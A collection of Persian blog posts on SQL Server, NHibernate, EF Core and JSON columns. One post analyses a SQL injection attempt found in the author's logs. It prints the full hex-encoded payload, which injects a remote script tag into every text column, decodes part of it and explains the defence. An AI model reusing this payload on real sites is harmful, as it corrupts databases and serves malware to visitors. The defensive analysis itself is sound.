امکان خاموش کردن parameter sniffing در سطح یک دیتابیس به SQL Server 2016 اضافه شدهاست
اطلاعات بیشتر
اطلاعات بیشتر
در این مطلب قصد دارم به نکاتی ساده در T-SQL بپردازم، امیدوارم مفید واقع شود.
1- تفاوت (*)Count و (Count(column
در (*)Count ، همه Rowها و مقادیرشان مورد جستجو قرار میگیرد، اما در (Count(column فقط مقادیر غیر Null ستون مورد نظر،مورد جستجو قرار میگیرد.
مثال:
Create Table Test(ID int,Firstname varchar(20)); Insert Into Test (ID,Firstname) Values(1,'K'); Insert Into Test (ID,Firstname) Values(2,'B'); Insert Into Test (ID) Values(3);
با اجرای Query زیر خواهیم داشت:
Select COUNT(*) From Test
خروجی آن 3 میباشد.
اما با اجرای Query زیر خواهیم داشت:
Select COUNT(Firstname) From Test
خروجی آن 2 میباشد، چون با توجه به سه رکوردی که در جدول Test درج شده بود، رکورد سوم برای فیلد Firstname با مقدار Null پر شده است.
- هرگاه در اجرای Count ،هدفتان بدست آوردن تعداد ستون خاصی است، از (Count(column استفاده نمایید.
2- بوسیله Scriptهای زیر میتوانیم عدد صفر تولید نماییم.
select count(cast(null as int))
select count(*) where 'a'='b'
select €
select ¥
select £
Select $
select count(*)-count(*)
select Ascii('A')-Ascii('A')
select LEN('')
3- با یک Select ساده میتوان نام ستون و مقدار را کنار هم نوشت و مشاهده نمود.
در مثال بالا مقادیر ستونها، عددی در نظر گرفته شده است، چنانچه تمایل به نمایش حروف داشته باشید، کافیست کاراکترهای حرفی را بین سنگل کوتیشن قرار دهید، همانند شکل زیر:
4- دو روش پیشنهادی برای تشخیص عدد بزرگتر از بین دو عدد
- روش اول
ابتدا به فرمول زیر توجه نمایید:
(a+b)+ABS(a-b)
حاصل جواب فرمول،برابر است با دو برابر عدد بزرگتر،بنابراین اگر حاصل فوق را ضربدر عدد 0/5 نماییم،عدد بزرگتر بدست خواهد آمد. در نتیجه خواهیم داشت:
0.5(a+b)+ABS(a-b)
با اجرای Script زیر خروجی عدد 90.34 میباشد:
DECLARE @Value1 DECIMAL(5,2) = 80.22 DECLARE @Value2 DECIMAL(5,2) =90.34 SELECT (0.5 * ((@Value1 + @Value2) + ABS(@Value1 - @Value2))) AS MaxColumn
اشکال در این روش این است که، اگر مقدار یکی از اعداد Null باشد،ماکزیمم بین دو عدد Null نمایش داده خواهد شد.
- روش دوم
DECLARE @Value1 DECIMAL(5,2) = 9.22 DECLARE @Value2 DECIMAL(5,2) = 8.34 SELECT CASE WHEN @Value1 > @Value2 THEN @Value1 ELSE @Value2 END AS MaxColumn
در این روش اگر مقدار یکی از اعداد Null باشد،ماکزیمم بین دو عدد، عدد غیر Null میباشد.
5- مشاهده مشخصات کلیه دیتابیسهای موجود در SQL Server با استفاده از Sys.Databases .
Select * From sys.databases
خروجی بصورت زیر خواهد بود:
6- بوسیله دستور OUTPUT میتوان خروجی Queryهای Delete،Update و Insert را مشاهده نمود:
مثال اول برای Query Delete :
در شکل، تک رکورد حذف شده را مشاهده مینمایید.
مثال دوم برای Query Update بصورت زیر میباشد:
در شکل، مقدار A، مقدار جدیدی است که بروز رسانی شده است و مقدار B مقداری است که مربوط به قبل از بروز رسانی میباشد.
مثال سوم برای Query Insert بصورت زیر میباشد:
موفق باشید.
در SQL Server 2016 با استفاده از فناوری «همیشه رمزنگاری شده»، اطلاعات بین کلاینتها و SQL Server دیگر به صورت plain text ارسال نخواهد شد. به همین منظور درایور ADO.NET جدیدی را هم طراحی کردهاند. 
در مورد طراحی یک برنامه "فرم ساز" در مطلب قبلی بحث شد ... حدودا سه سال قبل اینکار را برای شرکتی انجام دادم. یک برنامه درخواست خدمات نوشته شده با ASP.NET که مدیران برنامه میتوانستند برای آن فرم طراحی کنند؛ فرم درخواست پرینت، درخواست نصب نرم افزار، درخواست وام، درخواست پیک، درخواست آژانس و ... فرمهایی که تمامی نداشتند! آن زمان برای حل این مساله از فیلدهای XML استفاده کردم.
فیلدهای XML قابلیت نه چندان جدیدی هستند که از SQL Server 2005 به بعد اضافه شدهاند. مهمترین مزیت آنها هم امکان ذخیره سازی اطلاعات هر نوع شیءایی به عنوان یک فیلد XML است. یعنی همان زیرساختی که برای ایجاد یک برنامه فرم ساز نیاز است. ذخیره سازی آن هم آداب خاصی را طلب نمیکند. به ازای هر فیلد مورد نظر کاربر، یک نود جدید به صورت رشته معمولی باید اضافه شود و نهایتا رشته تولیدی باید ذخیره گردد. از دید ما یک رشته است، از دید SQL Server یک نوع XML واقعی؛ به همراه این مزیت مهم که به سادگی میتوان با T-SQL/XQuery/XPath از جزئیات اطلاعات این نوع فیلدها کوئری گرفت و سرعت کار هم واقعا بالا است؛ به علاوه بر خلاف مطلب قبلی در مورد dynamic components ، اینبار نیازی نیست تا به ازای هر یک فیلد درخواستی کاربر، واقعا یک فیلد جدید را به جدول خاصی اضافه کرد. داخل این فیلد XML هر نوع ساختار دلخواهی را میتوان ذخیره کرد. به عبارتی به کمک فیلدهایی از نوع XML میتوان داخل یک سیستم بانک اطلاعاتی رابطهای، schema-less کار کرد (un-typed XML) و همچنین از این اطلاعات ویژه، کوئریهای پیچیده هم گرفت.
تا جایی که اطلاع دارم، چند شرکت دیگر هم در ایران دقیقا از همین ایده فیلدهای XML برای ساخت برنامه فرم ساز استفاده کردهاند ...؛ البته مطلب جدیدی هم نیست؛ برنامههای فرم ساز اوراکل و IBM هم سالها است که از XML برای همین منظور استفاده میکنند. مایکروسافت هم به همین دلیل (شاید بتوان گفت مهمترین دلیل وجودی فیلدهای XML در SQL Server)، پشتیبانی توکاری از XML به عمل آورده است.
یا روش دیگری را که برای طراحی سیستمهای فرم ساز پیشنهاد میکنند استفاده از بانکهای اطلاعاتی مبتنی بر key-value مانند Redis یا RavenDb است؛ یا استفاده از بانکهای اطلاعاتی schema-less واقعی مانند CouchDb.
خوب ... اکنون سؤال این است که NHibernate برای کار با فیلدهای XML چه تمهیداتی را درنظر گرفته است؟
برای این منظور خاصیتی را که قرار است به یک فیلد از نوع XML نگاشت شود، با نوع XDocument مشخص خواهیم ساخت:
using System.Xml.Linq;
namespace TestModel
{
public class DynamicTable
{
public virtual int Id { get; set; }
public virtual XDocument Document { get; set; }
}
}
سپس باید جهت معرفی این نوع ویژه، به صورت صریح از XDocType استفاده کرد؛ یعنی نکتهی اصلی، استفاده از CustomType مرتبط است:
using FluentNHibernate.Automapping;
using FluentNHibernate.Automapping.Alterations;
using NHibernate.Type;
namespace TestModel
{
public class DynamicTableMapping : IAutoMappingOverride<DynamicTable>
{
public void Override(AutoMapping<DynamicTable> mapping)
{
mapping.Id(x => x.Id);
mapping.Map(x => x.Document).CustomType<XDocType>();
}
}
}
البته لازم به ذکر است که دو نوع NHibernate.Type.XDocType و NHibernate.Type.XmlDocType برای کار با فیلدهای XML در NHibernate وجود دارند. XDocType برای کار با نوع System.Xml.Linq.XDocument طراحی شده است و XmlDocType مخصوص نگاشت نوع System.Xml.XmlDocument است.
اکنون اگر به کمک کلاس SchemaExport ، اسکریپت تولید جدول متناظر با اطلاعات فوق را ایجاد کنیم به حاصل زیر خواهیم رسید:
if exists (select * from dbo.sysobjects
where id = object_id(N'[DynamicTable]') and OBJECTPROPERTY(id, N'IsUserTable') = 1)
drop table [DynamicTable]
create table [DynamicTable] (
Id INT IDENTITY NOT NULL,
Document XML null,
primary key (Id)
)
یک سری اعمال متداول ذخیره سازی اطلاعات و تهیه کوئری نیز در ادامه ذکر شدهاند:
//insert
object savedId = 0;
using (var session = sessionFactory.OpenSession())
{
using (var tx = session.BeginTransaction())
{
var obj = new DynamicTable
{
Document = System.Xml.Linq.XDocument.Parse(
@"<Doc><Node1>Text1</Node1><Node2>Text2</Node2></Doc>"
)
};
savedId = session.Save(obj);
tx.Commit();
}
}
//simple query
using (var session = sessionFactory.OpenSession())
{
using (var tx = session.BeginTransaction())
{
var entity = session.Get<DynamicTable>(savedId);
if (entity != null)
{
Console.WriteLine(entity.Document.Root.ToString());
}
tx.Commit();
}
}
//advanced query
using (var session = sessionFactory.OpenSession())
{
using (var tx = session.BeginTransaction())
{
var list = session.CreateSQLQuery("select [Document].value('(//Doc/Node1)[1]','nvarchar(255)') from [DynamicTable] where id=:p0")
.SetParameter("p0", savedId)
.List();
if (list != null)
{
Console.WriteLine(list[0]);
}
tx.Commit();
}
}
و در پایان بدیهی است که جهت کار با امکانات پیشرفتهتر موجود در SQL Server در مورد فیلدهای XML ( برای نمونه: + و +) باید مثلا رویه ذخیره شده تهیه کرد (یا مستقیما از متد CreateSQLQuery همانند مثال فوق کمک گرفت) و آنرا در NHibernate مورد استفاده قرار داد. البته به این صورت کار شما محدود به SQL Server خواهد شد و باید در نظر داشت که در کل تعداد کمی بانک اطلاعاتی وجود دارند که نوعهای XML را به صورت توکار پشتیبانی میکنند.
طبق رنکینگ سال 2016 شرکت گارتنر، در مورد بهترین سیستم مدیریت پایگاه
داده عملیاتی، SQL Server، برای دومین سال پیاپی
توانست ( بالاتر از اوراکل،) جایگاه اول را بدست آورد.
همیشه با نزدیک شدن آخر سال، به روز کردن مناسبتهای تقویم سال بعد ضروری میشود. دوستان لینوکسی ما هم در این مورد زحمت کشیده و برنامهای را تهیه کردهاند که از آدرس زیر قابل دریافت است:
http://download.gna.org/jalali-calendar/
پس از دریافت برنامه، مناسبتهای سال 1388 در فایل 1388.xml قابل مشاهده است (با تقدیر و تشکر از زحمات این عزیزان). فرض کنید میخواهیم این اطلاعات را به اس کیوال سرور منتقل کنیم.
فرمت این فایل به شکل زیر است:
<?xml version="1.0" encoding="UTF-8"?>
<cal1388>
<day>
<num>1/1</num>
<desc>عید نوروز، لحظه تحویل سال:ساعت 15 و 13 دقیقه و 39 ثانیه </desc>
</day>
</cal1388>
حداقل سه راه حل برای انجام اینکار (خواندن فایل xml توسط اس کیوال سرور) موجود است:
راه اول:
SELECT '1388' saal,
X.day.query('num').value('.', 'nVARCHAR(50)') rooz_maah,
X.day.query('desc').value('.', 'nVARCHAR(max)') tozih
FROM (
SELECT CAST(x AS XML)
FROM OPENROWSET(
BULK
'c:\1388.xml',
SINGLE_BLOB
) AS T(x)
) AS T(x)
CROSS APPLY x.nodes('cal1388/day') AS X(day);
راه دوم:
DECLARE @MyXML XML
SELECT @MyXML = CAST(x AS XML)
FROM OPENROWSET(
BULK
'c:\1388.xml',
SINGLE_BLOB
) AS T(x)
SELECT 1388 saal,
nref.value('num[1]', 'nvarchar(50)') rooz_maah,
nref.value('desc[1]', 'nvarchar(max)') tozih
FROM @MyXML.nodes('//day') AS R(nref)
راه سوم:
DECLARE @MyXML XML
DECLARE @handle INT
SELECT @MyXML = CAST(x AS XML)
FROM OPENROWSET(
BULK
'c:\1388.xml',
SINGLE_BLOB
) AS T(x)
EXEC sp_xml_preparedocument @handle OUTPUT,
@MyXML
SELECT 1388 saal,
*
FROM OPENXML(@handle, '/cal1388/day', 2) WITH
(num VARCHAR(20), [desc] NVARCHAR(MAX))
EXEC sp_xml_removedocument @handle
اکنون که میتوانیم اطلاعات این فایل را select کنیم، Insert آن ساده است . برای مثال:
INSERT INTO tblMonasebat
(
saal,
rooz_mah,
tozih
)
SELECT '1388' saal,
nref.value('num[1]', 'nvarchar(50)') rooz_maah,
nref.value('desc[1]', 'nvarchar(max)') tozih
FROM @MyXML.nodes('//day') AS R(nref)
بدیهی است امکان مقدار دهی @MyXML به صورت یک رشته که حاوی محتویات فایل است نیز مهیا میباشد (بجای خواندن از فایل).
برای مطالعهی بیشتر
XML Support in Microsoft SQL Server 2005
Beginning SQL Server 2005 XML Programming
هدف از این سری مثالها، آشنایی با متدها و توابعی است که در حین کار با خواص رشتهای در LINQ to Entities، مجاز به استفادهی از آنها هستیم و همچنین اگر تابعی در EF-Core هنوز تعریف نشده بود، راه حل چیست.
مثال 1: نام تمام کاربران را با قالب 'Surname, Firstname' نمایش دهید.
متد Select میتواند به همراه اعمال محاسباتی سادهای نیز باشد که نمونهای از آنرا در اینجا مشاهده میکنید.
با این خروجی:
مثال 2: تمام امکاناتی را که با Tennis شروع میشوند، لیست کنید.
این گزارش به همراه تمام ستونهای جدول است.
متدهای استانداردی مانند StartsWith، EndsWith و Contains را میتوان بر روی خواص رشتهای بکار برد.
با این خروجی:
مثال 3: تمام امکاناتی را که با tennis شروع میشوند، لیست کنید. این جستجو باید غیرحساس به بزرگی و کوچکی حروف باشد.
این گزارش به همراه تمام ستونهای جدول است.
نیازی به انجام مجزای این تمرین نیست؛ چون پاسخ آن همان پاسخ مثال 2 است. Collation پیشفرض در SQL Server، غیرحساس به بزرگی و کوچکی حروف است. بنابراین چه tennis را جستجو کنیم و یا TeNnis را، تفاوتی نمیکند.
مثال 4: شماره تلفنهای دارای پرانتز را لیست کنید.
این گزارش باید به همراه ستونهای memid, telephone باشد.
روش اول: در اینجا دوبار از متد Contains استفاده شدهاست:
با این خروجی:
روش دوم: اگر میخواهیم کنترل بیشتری را بر روی خروجی نهایی LIKE تولیدی داشته باشیم، میتوان از متد سفارشی استاندارد EF.Functions.Like استفاده کرد که از حروف wild cards نیز پشتیبانی میکند:
با این خروجی:
مثال 5: کد پستیها 5 رقمی هستند. گزارشی را تهیه کنید که در آن اگر کدپستی کمتر از 5 رقم بود، ابتدای آن با صفر شروع شود.
هدف اصلی از این مثال، اعمال متد PadLeft(5, '0') به خاصیت member.ZipCode است.
روش اول: EF-Core فعلا قابلیت ترجمهی PadLeft(5, '0') را به معادل SQL آنرا ندارد. به همین جهت مجبور هستیم ابتدا ZipCodeها را به صورت رشتهای بازگشت دهیم که در اینجا استفادهی از Convert.ToString مجاز است.
با این خروجی:
سپس میتوان بر روی لیست آمادهی موجود در حافظه، از LINQ to Objects استفاده کرد و در این حالت دسترسی کاملی به تمام امکانات زبان #C وجود دارد:
روش دوم: SQL Server به همراه تابع استانداردی به نام Replicate است که از آن میتوان برای شبیه سازی PadLeft، بدون متوسل شدن به LINQ to Objects، استفاده کرد. اما چون این تابع هنوز به EF-Core معرفی نشدهاست، نیاز است خودمان اینکار را انجام دهیم. در این روش، از متد SqlDbFunctionsExtensions.SqlReplicate استفاده میشود. روش تعریف این نوع متدها را در مطلب «امکان تعریف توابع خاص بانکهای اطلاعاتی در EF Core» پیشتر بررسی کردهایم که برای مثال در اینجا چنین شکلی را پیدا میکند:
پس از آن فقط کافی است متد AddCustomSqlFunctions را به Context برنامه معرفی کنیم:
اکنون میتوان از تابع SqlDbFunctionsExtensions.SqlReplicate جهت شبیه سازی PadLeft به صورت زیر استفاده کرد:
با این خروجی:
مثال 6: اولین حرف نام خانوادگی کاربران در کل ردیفهای جدول چندبار تکرار شدهاست؟
این گزارش باید به همراه ستونهای letter, count باشد.
هدف از این مثال بیان مجاز بودن استفادهی از متد Substring بر روی خواص رشتهای است که EF-Core امکان ترجمهی آنها را به کدهای SQL دارد.
با این خروجی:
مثال 7: حروف '-','(',')', ' ' را از شماره تلفنها حذف کنید.
این گزارش باید به همراه ستونهای memid, telephone باشد.
بانک اطلاعاتی PostgreSQL به همراه تابع استاندارد regexp_replace است و میتوان از آن برای حل یک چنین مسایلی استفاده کرد:
اما SQL Server هنوز هم به همراه یک چنین تابعی نیست. بنابراین از روش زیر نیز میتوان مثال جاری را حل کرد:
با این خروجی:
کدهای کامل این قسمت را در اینجا میتوانید مشاهده کنید.
مثال 1: نام تمام کاربران را با قالب 'Surname, Firstname' نمایش دهید.
var members = context.Members
.Select(member => new { Name = member.Surname + ", " + member.FirstName })
.ToList(); با این خروجی:
مثال 2: تمام امکاناتی را که با Tennis شروع میشوند، لیست کنید.
این گزارش به همراه تمام ستونهای جدول است.
var facilities = context.Facilities
.Where(facility => facility.Name.StartsWith("Tennis"))
.ToList(); با این خروجی:
مثال 3: تمام امکاناتی را که با tennis شروع میشوند، لیست کنید. این جستجو باید غیرحساس به بزرگی و کوچکی حروف باشد.
این گزارش به همراه تمام ستونهای جدول است.
نیازی به انجام مجزای این تمرین نیست؛ چون پاسخ آن همان پاسخ مثال 2 است. Collation پیشفرض در SQL Server، غیرحساس به بزرگی و کوچکی حروف است. بنابراین چه tennis را جستجو کنیم و یا TeNnis را، تفاوتی نمیکند.
مثال 4: شماره تلفنهای دارای پرانتز را لیست کنید.
این گزارش باید به همراه ستونهای memid, telephone باشد.
روش اول: در اینجا دوبار از متد Contains استفاده شدهاست:
var members = context.Members
.Select(member => new { member.MemId, member.Telephone })
.Where(member => member.Telephone.Contains("(")
&& member.Telephone.Contains(")"))
.ToList(); 
روش دوم: اگر میخواهیم کنترل بیشتری را بر روی خروجی نهایی LIKE تولیدی داشته باشیم، میتوان از متد سفارشی استاندارد EF.Functions.Like استفاده کرد که از حروف wild cards نیز پشتیبانی میکند:
members = context.Members
.Select(member => new { member.MemId, member.Telephone })
.Where(member => EF.Functions.Like(member.Telephone, "%[()]%"))
.ToList(); 
مثال 5: کد پستیها 5 رقمی هستند. گزارشی را تهیه کنید که در آن اگر کدپستی کمتر از 5 رقم بود، ابتدای آن با صفر شروع شود.
هدف اصلی از این مثال، اعمال متد PadLeft(5, '0') به خاصیت member.ZipCode است.
روش اول: EF-Core فعلا قابلیت ترجمهی PadLeft(5, '0') را به معادل SQL آنرا ندارد. به همین جهت مجبور هستیم ابتدا ZipCodeها را به صورت رشتهای بازگشت دهیم که در اینجا استفادهی از Convert.ToString مجاز است.
با این خروجی:
SELECT CONVERT (NVARCHAR (MAX), [m].[ZipCode]) AS [Zip] FROM [Members] AS [m] ORDER BY CONVERT (NVARCHAR (MAX), [m].[ZipCode]);
var members = context.Members
.Select(member => new { ZipCode = Convert.ToString(member.ZipCode) })
.OrderBy(m => m.ZipCode)
.ToList();
// Now using LINQ to Objects
members = members.Select(member => new { ZipCode = member.ZipCode.PadLeft(5, '0') })
.OrderBy(m => m.ZipCode)
.ToList(); روش دوم: SQL Server به همراه تابع استانداردی به نام Replicate است که از آن میتوان برای شبیه سازی PadLeft، بدون متوسل شدن به LINQ to Objects، استفاده کرد. اما چون این تابع هنوز به EF-Core معرفی نشدهاست، نیاز است خودمان اینکار را انجام دهیم. در این روش، از متد SqlDbFunctionsExtensions.SqlReplicate استفاده میشود. روش تعریف این نوع متدها را در مطلب «امکان تعریف توابع خاص بانکهای اطلاعاتی در EF Core» پیشتر بررسی کردهایم که برای مثال در اینجا چنین شکلی را پیدا میکند:
namespace EFCorePgExercises.Utils
{
public static class SqlDbFunctionsExtensions
{
public static string SqlReplicate(string expression, int count)
=> throw new InvalidOperationException($"{nameof(SqlReplicate)} method cannot be called from the client side.");
private static readonly MethodInfo _sqlReplicateMethodInfo = typeof(SqlDbFunctionsExtensions)
.GetRuntimeMethod(
nameof(SqlDbFunctionsExtensions.SqlReplicate),
new[] { typeof(string), typeof(int) }
);
public static void AddCustomSqlFunctions(this ModelBuilder modelBuilder)
{
modelBuilder.HasDbFunction(_sqlReplicateMethodInfo)
.HasTranslation(args =>
{
return SqlFunctionExpression.Create("REPLICATE",
args,
_sqlReplicateMethodInfo.ReturnType,
typeMapping: null);
});
}
}
} namespace EFCorePgExercises.DataLayer
{
public class ApplicationDbContext : DbContext
{
// ...
protected override void OnModelCreating(ModelBuilder modelBuilder)
{
// ...
modelBuilder.AddCustomSqlFunctions();
// ...
}
}
} var newMembers = context.Members
.Select(member => new
{
ZipCode =
SqlDbFunctionsExtensions.SqlReplicate(
"0", 5 - Convert.ToString(member.ZipCode).Length)
+ member.ZipCode
})
.OrderBy(m => m.ZipCode)
.ToList(); 
مثال 6: اولین حرف نام خانوادگی کاربران در کل ردیفهای جدول چندبار تکرار شدهاست؟
این گزارش باید به همراه ستونهای letter, count باشد.
var members = context.Members
.Select(member => new { Letter = member.Surname.Substring(0, 1) })
.GroupBy(m => m.Letter)
.Select(g => new
{
Letter = g.Key,
Count = g.Count()
})
.OrderBy(r => r.Letter)
.ToList(); با این خروجی:
مثال 7: حروف '-','(',')', ' ' را از شماره تلفنها حذف کنید.
این گزارش باید به همراه ستونهای memid, telephone باشد.
بانک اطلاعاتی PostgreSQL به همراه تابع استاندارد regexp_replace است و میتوان از آن برای حل یک چنین مسایلی استفاده کرد:
select memid, regexp_replace(telephone, '[^0-9]', '', 'g') as telephone from members order by memid;
var members = context.Members
.Select(member => new
{
member.MemId,
Telephone = member.Telephone.Replace("-", "")
.Replace("(", "")
.Replace(")", "")
.Replace(" ", "")
})
.OrderBy(r => r.MemId)
.ToList(); 
کدهای کامل این قسمت را در اینجا میتوانید مشاهده کنید.
چند روز پیش داشتم لاگهای خطای یکی از سایتهایی رو که درست کردهام بررسی میکردم، متوجه حجم بالای فایل لاگ خطای آن شدم (در چند سایت مختلف این مورد مشابه را دیدم). پس از بررسی، مورد زیر بسیار جالب بود:
Log Entry :
Error Raw Url :/show.aspx?id=15;DECLARE%20@S%20CHAR(4000);SET%20@S=
CAST(0x4445434C415245204054207661726368617228323535292C404
32076617263686172283430303029204445434C415245205461626C655F4375727
36F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616
D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E
642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78
747970653D323331206F7220622E78747970653D31363729204F50454E205461626C65
5F437572736F72204645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3
02920424547494E20657865632827757064617465205B272B40542B275D20736574205B
272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E
3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4
0432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073
72633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6
A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20
205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461
626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
IP=120.129.71.187
vahidnasiri.blogspot.com
خوب این چی هست؟!
قبل از اینکه با اجرای عبارت SQL فوق به صورت تستی و محض کنجکاوی، کل دیتابیس جاری (SQL server) را آلوده کنیم میشود تنها قسمت cast آنرا مورد بررسی قرار داد. برای مثال به صورت زیر:
print CAST(0x444... AS CHAR(4000))
خروجی، عبارت زیر خواهد بود که به صورت استادانهای مخفی شده است:
DECLARE @T varchar(255),
@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR
SELECT a.name,
b.name
FROM sysobjects a,
syscolumns b
WHERE a.id = b.id
AND a.xtype = 'u'
AND (
b.xtype = 99
OR b.xtype = 35
OR b.xtype = 231
OR b.xtype = 167
)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
.....عبارت T-SQL فوق، تمامی فیلدهای متنی (varchar ، char ، text و امثال آن) کلیه جداول دیتابیس جاری را پیدا کرده و به آنها اسکریپتی را اضافه میکند. (آدرسهای فوق وجود ندارد و بنابراین ارجاع آن صرفا سبب کندی شدید باز شدن صفحات سایت خواهد شد بدون اینکه نمایش ظاهری خاصی را مشاهده نمائید)
این حمله اس کیوال موفق نبود. علت؟
اگر به آدرس بالا دقت کنید آدرس صفحه به show.aspx?id=15 ختم میشود. برای مثال نمایش خبر شماره 15 در سایت. در اینجا، هدف، دریافت یک عدد صحیح از طریق query string است و نه هیچ چیز دیگری. بنابراین قبل از انجام هر کاری و تنها با بررسی نوع داده دریافتی، این نوع حملات عقیم خواهند شد. (برای مثال بکارگیری ...int.Parse(Request) در صورت عدم دریافت یک متغیر عددی، سبب ایجاد یک exception شده و برنامه در همین نقطه متوقف میشود)
IP های زیر حمله بالا رو انجام دادند:
IP=61.153.33.106
IP=211.207.124.182
IP=59.63.97.18
IP=117.88.137.174
IP=58.19.130.130
IP=121.227.61.188
IP=125.186.252.99
IP=218.79.55.50
IP=125.115.2.4
IP=221.11.190.75
IP=120.129.71.187
IP=221.205.71.199
IP=59.63.97.18
IP=121.227.61.188
این آی پیها یا چینی هستند یا کرهای و البته الزامی هم ندارد که حتما متعلق به این کشورها باشند (استفاده از پروکسی توسط یک "هموطن" برای مثال).
حالا شاید سؤال بپرسید که چرا از این اعداد هگز استفاده کردهاند؟ چرا مستقیما عبارت sql را وارد نکردهاند؟
همیشه ورودی ما از یک کوئری استرینگ عدد نخواهد بود (بسته به طراحی برنامه). در این موارد بررسی اعتبار کوئری استرینگ وارد شده بسیار مشکل میشود. برای مثال میشود تابعی طراحی کرد که اگر در مقدار دریافتی از کوئری استرینگ، select یا insert یا update و امثال آن وجود داشت، به صورت خودکار آنها را حذف کند. اما استفاده از cast فوق توسط فرد مهاجم، عملا این نوع روشها را ناکارآمد خواهد کرد. برای مقابله با این حملات اولین اصلی را که باید بهخاطر داشت این است: به کاربر اجازه انشاء نوشتن ندهید! اگر قرار است طول رشته دریافتی مثلا 32 کاراکتر باشد، او حق ندارد بیشتر از این مقداری را وارد نماید (به طول بیش از اندازه رشته وارد شده فوق دقت نمائید).
و موارد دیگری از این دست (شامل تنظیمات IIS ، روشهای صحیح استفاده از ADO.NET برای مقابله با این نوع حملات و غیره) که خلاصه آنها را در کتاب فارسی زیر میتوانید پیدا کنید:
http://naghoos-andisheh.ir/product_info.php?products_id=197
در مطلب قبلی، مدل EAV را معرفی کردیم و گفتیم که این نوع پیادهسازی در واقع یک SQL Smell است؛ زیرا کوئری نویسی را سخت میکند و همچنین به دلیل عدم امکان تعریف constraints، کنترلی بر روی صحت دیتاهای وارده شد نخواهیم داشت. در نهایت با برنامهای روبرو خواهیم شد که درک صحیحی از ماهیت دیتا ندارد. اما اگر در شرایطی مجبور به استفادهی از این مدل هستید، بهتر است از فرمت JSON برای ذخیرهسازی دیتای داینامیک استفاده کنید. بیشتر دیتابیسهای رابطهایی به صورت native از نوع دادهایی JSON پشتیبانی میکنند:
CREATE TABLE EmployeeJsonAttributes ( Id int NOT NULL AUTO_INCREMENT, EmployeeId int NOT NULL, Attributes json DEFAULT NULL, PRIMARY KEY (Id), FOREIGN KEY (EmployeeId) REFERENCES EmployeeEav (Id) ON DELETE CASCADE )
INSERT INTO EmployeeJsonAttributes VALUES (
101,
'{
"name": "Jon",
"lastName": "Doe",
"dateOfBirth": "1989-01-01 10:10:10+05:30",
"skills": [ "C#", "JS" ],
"address": {
"country": "UK",
"city": "London",
"email": "jon.doe@example.com"
}
}'
)
INSERT INTO efcoresample.EmployeeJsonAttributes VALUES (
101,
JSON_OBJECT(
"name", "Jon",
"lastName", "Doe",
"dateOfBirth", "1989-01-01 10:10:10+05:30",
"skills", JSON_ARRAY("C#", "JS"),
"address", JSON_OBJECT(
"country", "UK",
"city", "London",
"email", "jon.doe@example.com"
)
)
) به عنوان مثال در ادامه میخواهیم کشور محل تولد یک کاربر خاص را نمایش دهیم. برای اینکار میتوانیم از JSON_EXTRACT استفاده کنیم:
SELECT JSON_EXTRACT(Attributes, '$.address.country') as Country FROM EmployeeJsonAttributes WHERE EmployeeId = 101; -- Conutry -- "UK"
همچنین میتوانیم از عملگر column-path نیز به جای JSON_EXTRACT استفاده کنیم:
SELECT Attributes -> '$.address.country' as Country FROM EmployeeJsonAttributes WHERE EmployeeId = 101; -- Conutry -- "UK"
بنابراین به راحتی میتوانیم کوئری مطلب قبل را اینگونه بازنویسی کنیم:
SELECT EmployeeId, Attributes ->> '$.DateOfBirth' AS BirthDate FROM EmployeeJsonAttributes WHERE Attributes ->> '$.DateOfBirth' > DATE_SUB(CURRENT_DATE(), INTERVAL 25 YEAR)
استفاده از JSON در EF Core
متاسفانه در EF Core به صورت مستقیم نمیتوانیم از JSON درون کلاسهای سیشارپ استفاده کنیم (+ )، در نتیجه در سمت کلاسهای سیشارپ باید از string استفاده کنیم و به نوعی به EF Core اطلاع دهیم که تایپ ستون موردنظرمان JSON است. در نتیجه خروجی نهایی درون دیتابیس، یک فیلد با تایپ JSON خواهد بود. برای اینکار به دو شیوه میتوانیم تایپ ستون موردنظر را تعیین کنیم:
// Fluent API
protected override void OnModelCreating(ModelBuilder modelBuilder)
{
modelBuilder.Entity<Employee>(entity =>
{
entity.Property(e => e.Attributes).HasColumnType("json");
});
}
// Data Annotations
[Column(TypeName = "json")]
public string Attributes { get; set; } در نهایت برای تشکیل بانک اطلاعاتی، به مدلی با ساختار زیر نیاز خواهیم داشت:
public class EmployeeJsonAttribute
{
public int Id { get; set; }
public virtual EmployeeEav Employee { get; set; }
public int EmployeeId { get; set; }
[Column(TypeName = "json")]
public string Attributes { get; set; }
} dbContext.EmployeeJsonAttributes.Add(new EmployeeJsonAttribute
{
EmployeeId = 101,
Attributes = JsonSerializer.Serialize(new
{
FirstName = "Sirwan",
LastName = "Afifi",
DateOfBirth = DateTime.Now.AddYears(-31)
})
});
dbContext.SaveChanges(); var employee = dbContext.EmployeeJsonAttributes.Find(201); Console.WriteLine(JsonSerializer.Deserialize<Employee>(employee.Attributes).DateOfBirth);
برای نوشتن کوئری روی ستون JSON میتوانید از Query Types نیز استفاده کنید.
سلام
در مثال بالا چون نظرات با یک پست مرتبط هستند قاعدتا براساس یک پست خاص کامنتها رو محدود میکنیم. ولی اگه بخواهیم یک کامنت خاص رو با زیر مجموعه هاش دریافت کنیم شرط جستجو رو چطور باید بنویسیم؟
راهکار زیر در sql هست که دیتابیس رو به sql server محدود میکنه و معادل لینک هم فکر نکنم داشته باشه.
DECLARE @Table TABLE(
ID INT,
ParentID INT,
NAME VARCHAR(20)
)
INSERT INTO @Table (ID,ParentID,[NAME]) SELECT 1, NULL, 'A'
INSERT INTO @Table (ID,ParentID,[NAME]) SELECT 2, 1, 'B-1'
